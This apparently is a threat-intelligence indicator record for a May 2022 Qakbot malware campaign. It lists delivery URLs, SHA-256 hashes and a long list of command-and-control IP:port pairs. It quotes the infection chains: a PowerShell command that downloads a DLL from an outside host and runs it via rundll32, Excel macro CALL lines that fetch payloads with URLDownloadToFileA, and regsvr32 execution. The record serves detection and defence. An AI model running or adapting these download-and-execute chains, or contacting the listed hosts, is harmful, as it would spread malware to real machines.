Qakbot_AA_31.05.2022.txt
31.05.2022 | Qakbot | AA | Campaign 1653985220 | Version 403.688
*************************************************
.url https://nkic.edu.np/itet/aeuqutt (.xlsb)
.url http://evoluicursos.com/ee/qiedsua (.lnk)
.url HTTPS://projetomemoravel.com/hQfHMUFZg/FF.png
.url HTTPS://apsosyal.com/8Hg65CnSrJd4/FF.png
.url HTTPS://igitplacements.ac.in/olmkmS4I/FF.png
.zip c14971d5e3ab98b929e40cc493462b120fadbfd21893f6d5819f3281ebb05c9b (lnk)
.xls f1dc179d7a3aeb57b86d939b5b4d116b3b7778f9ac79b11d1c2e5a410436effa
.dll 1176381ebfc60acd5078c5a6ac4ac5a0defffce6f1a6c1f6fbe830dd2df6c3e6
.dll bde66b4246cfbb415549464b424ffd581885dc8a2b85cb2d2676ead4d66b64e8
.dll c9c0e45015785baff7f64720ba9c3ec85e70506cf78a6e25e8f11bc6949aadbb
*************************************************
Exec (.lnk chain) >>
cmd /c C:\Users\Admin\AppData\Local\Temp\form5.6.2021.lnk
powershell.exe -NoE iwr -Uri https://projetomemoravel.com/hQfHMUFZg/FF.png -OutFile $env:TEMP\hjghu.dll;saps rundll32.exe $env:TEMP\hjghu.dll,DllRegisterServer
rundll32.exe" C:\Users\Admin\AppData\Local\Temp\hjghu.dll DllRegisterServer
*************************************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Vrhgdast", 0)
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Vrhgdast\Tfujist", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://projetomemoravel.com/hQfHMUFZg/FF.png", "C:\Vrhgdast\Tfujist\Eghejdor.ooooccccxxxxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://apsosyal.com/8Hg65CnSrJd4/FF.png", "C:\Vrhgdast\Tfujist\Eghejdor1.ooooccccxxxxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://igitplacements.ac.in/olmkmS4I/FF.png", "C:\Vrhgdast\Tfujist\Eghejdor2.ooooccccxxxxx")
*************************************************
Exec (.xlsb chain) >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\593ddfe9dfe7fb77c416ba293e3e3f7a04a7df4fb102bde52ca151eda7f71820.xlsb
Regsvr32 /s calc
Regsvr32 C:\Vrhgdast\Tfujist\Eghejdor.ooooccccxxxxx
Regsvr32 C:\Vrhgdast\Tfujist\Eghejdor1.ooooccccxxxxx
Regsvr32 C:\Vrhgdast\Tfujist\Eghejdor2.ooooccccxxxxx
*************************************************
*************************************************
C2s (IP:port)
175.145.235.37:443
148.0.61.36:443
217.165.97.52:993
121.7.223.45:2222
47.23.89.60:993
84.241.8.23:32103
39.44.66.76:995
217.164.118.38:2222
89.211.179.247:2222
74.14.5.179:2222
86.195.158.178:2222
39.52.80.230:995
67.165.206.193:993
5.32.41.45:443
1.161.123.180:443
217.165.176.49:2222
124.40.244.115:2222
37.34.253.233:443
82.152.39.39:443
37.186.54.254:995
186.90.153.162:2222
120.150.218.241:995
41.86.42.158:995
117.248.109.38:21
182.191.92.203:995
91.177.173.10:995
187.207.131.50:61202
217.128.122.65:2222
32.221.224.140:995
70.46.220.114:443
24.178.196.158:2222
45.241.169.86:993
39.49.111.194:995
140.82.63.183:995
144.202.3.39:443
144.202.2.175:995
45.76.167.26:995
45.63.1.12:995
144.202.3.39:995
45.63.1.12:443
144.202.2.175:443
140.82.63.183:443
149.28.238.199:995
45.76.167.26:443
149.28.238.199:443
173.174.216.62:443
24.139.72.117:443
89.86.33.217:443
80.11.74.81:2222
217.164.118.38:1194
140.82.49.12:443
176.67.56.94:443
108.60.213.141:443
93.48.80.198:995
76.70.9.169:2222
67.209.195.198:443
92.132.172.197:2222
148.64.96.100:443
202.134.152.2:2222
39.44.106.187:995
75.99.168.194:61201
47.156.131.10:443
69.14.172.24:443
1.161.123.180:995
174.69.215.101:443
85.246.82.244:443
173.21.10.71:2222
76.25.142.196:443
210.246.4.69:995
39.41.225.204:995
73.151.236.31:443
45.46.53.140:2222
208.107.221.224:443
189.223.134.157:443
187.208.127.127:443
72.252.157.93:990
70.51.135.90:2222
102.182.232.3:995
189.203.103.147:22
72.252.157.93:993
187.16.64.193:2222
41.38.167.179:995
177.139.44.173:32101
90.120.65.153:2078
24.55.67.176:443
109.12.111.14:443
72.252.157.93:995
179.158.105.44:443
201.172.23.68:2222
41.84.233.25:995
196.203.37.215:80
191.112.1.69:443
31.48.174.63:2078
177.205.155.85:443
2.50.137.23:443
79.129.121.68:995
197.83.230.112:443
179.100.20.32:32101
106.51.48.170:50001
86.97.9.190:443
41.84.240.230:443
172.115.177.204:2222
46.198.231.232:995
111.125.245.116:995
96.37.113.36:993
124.109.35.32:995
78.100.210.132:6883
201.242.175.29:2222
47.157.227.70:443
190.252.242.69:443
63.143.92.99:995
40.134.246.185:995
38.70.253.226:2222
100.1.108.246:443
78.169.246.124:443
125.24.105.160:443
177.133.210.218:443
180.129.108.214:995
82.41.63.217:443
189.146.87.77:443
187.172.146.147:443
217.165.79.88:443
85.255.234.203:443
94.36.191.129:2222
103.246.242.202:443
197.92.129.0:443
41.230.62.211:995
72.27.86.98:443
31.35.28.29:443
67.69.166.79:2222
180.127.90.0:2222
79.80.80.29:2222
172.114.160.81:995
94.26.122.9:995
75.99.168.194:443
189.253.206.105:443
81.215.196.174:443
46.107.48.202:443
59.93.93.37:443
2.34.12.8:443
181.208.248.227:443
103.116.178.85:995
41.228.22.180:443
120.61.2.124:443
89.137.52.44:443
72.66.116.235:995
125.168.47.127:2222
72.76.94.99:443
103.107.113.83:443
113.89.6.31:995